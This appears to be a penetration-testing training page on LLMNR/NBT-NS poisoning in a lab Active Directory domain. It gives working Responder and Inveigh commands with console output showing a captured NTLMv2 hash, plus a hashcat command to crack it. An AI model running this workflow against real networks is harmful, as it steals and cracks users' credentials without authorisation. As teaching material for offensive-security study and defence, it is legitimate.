LLMNR/NBT-NS Poisoning
Quick Example
Let's walk through a quick example of the attack flow at a very high level:
A host attempts to connect to the print server at \\print01.inlanefreight.local, but accidentally types in \\printer01.inlanefreight.local.
The DNS server responds, stating that this host is unknown.
The host then broadcasts out to the entire local network asking if anyone knows the location of \\printer01.inlanefreight.local.
The attacker (us with
Responderrunning) responds to the host stating that it is the \\printer01.inlanefreight.local that the host is looking for.The host believes this reply and sends an authentication request to the attacker with a username and NTLMv2 password hash.
This hash can then be cracked offline or used in an SMB Relay attack if the right conditions exist.
Tools
Tool
Description
Responder is a purpose-built tool to poison LLMNR, NBT-NS, and MDNS, with many different functions.
Inveigh is a cross-platform MITM platform that can be used for spoofing and poisoning attacks.
Metasploit has several built-in scanners and spoofing modules made to deal with poisoning attacks.
Both responder and inveigh can attack the following protocols: LLMNR, DNS, MDNS, NBNS, DHCP, ICMP, HTTP, HTTPS, SMB, LDAP, WebDAV, Proxy Auth
But responder also has support for:
MSSQL
DCE-RPC
FTP, POP3, IMAP, and SMTP auth
Sample Exploitation
Linux
Start Responder
$ sudo responder -I ens224 __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 3.0.6.0 Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C [+] Poisoners: LLMNR [ON] NBT-NS [ON] DNS/MDNS [ON] [+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [OFF] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] [+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF] [+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Fingerprint hosts [OFF] [+] Generic Options: Responder NIC [ens224] Responder IP [172.16.5.225] Challenge set [random] Don't Respond To Names ['ISATAP'] [+] Current Session Variables: Responder Machine Name [WIN-72Y80BU39K4] Responder Domain Name [124M.LOCAL] Responder DCE-RPC Port [49109] [!] Error starting TCP server on port 3389, check permissions or other servers running. [+] Listening for events... [*] [LLMNR] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0 [*] [MDNS] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0.local [*] [MDNS] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0.local [*] [LLMNR] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0 [*] [MDNS] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0.local [*] [LLMNR] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0 [*] [MDNS] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0.local [*] [LLMNR] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0 [*] [MDNS] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0.local [*] [LLMNR] Poisoned answer sent to 172.16.5.130 for name academy-ea-web0 [*] Skipping previously captured hash for INLANEFREIGHT\lab_adm [SMB] NTLMv2-SSP Client : 172.16.5.130 [SMB] NTLMv2-SSP Username : INLANEFREIGHT\backupagent [SMB] NTLMv2-SSP Hash : backupagent::INLANEFREIGHT:63d7f544c395e21e:A0FDD20C576AA5BA6901A4B8E25101F4:010100000000000000558A1501E3D901AE687130E3EBF6FB00000000020008003100320034004D0001001E00570049004E002D003700320059003800300042005500330039004B00340004003400570049004E002D003700320059003800300042005500330039004B0034002E003100320034004D002E004C004F00430041004C00030014003100320034004D002E004C004F00430041004C00050014003100320034004D002E004C004F00430041004C000700080000558A1501E3D9010600040002000000080030003000000000000000000000000030000083E026FD817AC3DDCEFFFEDEE543B62660CE84A9C2C47D025FBB90D92498E24B0A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000Cracking NTLMv2 hash with hashcat
$ cat hash.txt backupagent::INLANEFREIGHT:13409d5f8e108375:471CFF4F43598ED4FECE37551BB9FB24:010100000000000000558A1501E3D90186A5C66E784510EE00000000020008003100320034004D0001001E00570049004E002D003700320059003800300042005500330039004B00340004003400570049004E002D003700320059003800300042005500330039004B0034002E003100320034004D002E004C004F00430041004C00030014003100320034004D002E004C004F00430041004C00050014003100320034004D002E004C004F00430041004C000700080000558A1501E3D9010600040002000000080030003000000000000000000000000030000083E026FD817AC3DDCEFFFEDEE543B62660CE84A9C2C47D025FBB90D92498E24B0A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000 $ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txtWe now have the plaintext password of the user
Windows
Start Inveigh
PS C:\htb> Import-Module .\Inveigh.ps1 PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y [*] Inveigh 1.506 started at 2022-02-28T19:26:30 [+] Elevated Privilege Mode = Enabled [+] Primary IP Address = 172.16.5.25 [+] Spoofer IP Address = 172.16.5.25 [+] ADIDNS Spoofer = Disabled [+] DNS Spoofer = Enabled [+] DNS TTL = 30 Seconds [+] LLMNR Spoofer = Enabled [+] LLMNR TTL = 30 Seconds [+] mDNS Spoofer = Disabled [+] NBNS Spoofer For Types 00,20 = Enabled [+] NBNS TTL = 165 Seconds [+] SMB Capture = Enabled [+] HTTP Capture = Enabled [+] HTTPS Certificate Issuer = Inveigh [+] HTTPS Certificate CN = localhost [+] HTTPS Capture = Enabled [+] HTTP/HTTPS Authentication = NTLM [+] WPAD Authentication = NTLM [+] WPAD NTLM Authentication Ignore List = Firefox [+] WPAD Response = Enabled [+] Kerberos TGT Capture = Disabled [+] Machine Account Capture = Disabled [+] Console Output = Full [+] File Output = Enabled [+] Output Directory = C:\Tools WARNING: [!] Run Stop-Inveigh to stop [*] Press any key to stop console output WARNING: [-] [2022-02-28T19:26:31] Error starting HTTP listener WARNING: [!] [2022-02-28T19:26:31] Exception calling "Start" with "0" argument(s): "An attempt was made to access a socket in a way forbidden by its access permissions" $HTTP_listener.Start() [+] [2022-02-28T19:26:31] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled] [+] [2022-02-28T19:26:31] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled] [+] [2022-02-28T19:26:31] LLMNR request for academy-ea-web0 received from 172.16.5.125 [response sent] [+] [2022-02-28T19:26:32] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled] [+] [2022-02-28T19:26:32] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled] [+] [2022-02-28T19:26:32] LLMNR request for academy-ea-web0 received from 172.16.5.125 [response sent] [+] [2022-02-28T19:26:32] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled] [+] [2022-02-28T19:26:32] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled] [+] [2022-02-28T19:26:32] LLMNR request for academy-ea-web0 received from 172.16.5.125 [response sent] [+] [2022-02-28T19:26:33] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled] [+] [2022-02-28T19:26:33] mDNS(QM) request academy-ea-web0.local received from 172.16.5.125 [spoofer disabled] [+] [2022-02-28T19:26:33] LLMNR request for academy-ea-web0 received from 172.16.5.125 [response sent] [+] [2022-02-28T19:26:34] TCP(445) SYN packet detected from 172.16.5.125:56834 [+] [2022-02-28T19:26:34] SMB(445) negotiation request detected from 172.16.5.125:56834 [+] [2022-02-28T19:26:34] SMB(445) NTLM challenge 7E3B0E53ADB4AE51 sent to 172.16.5.125:56834Retrieve the Hash and crack it using hashcat as same as the method in linux
Last updated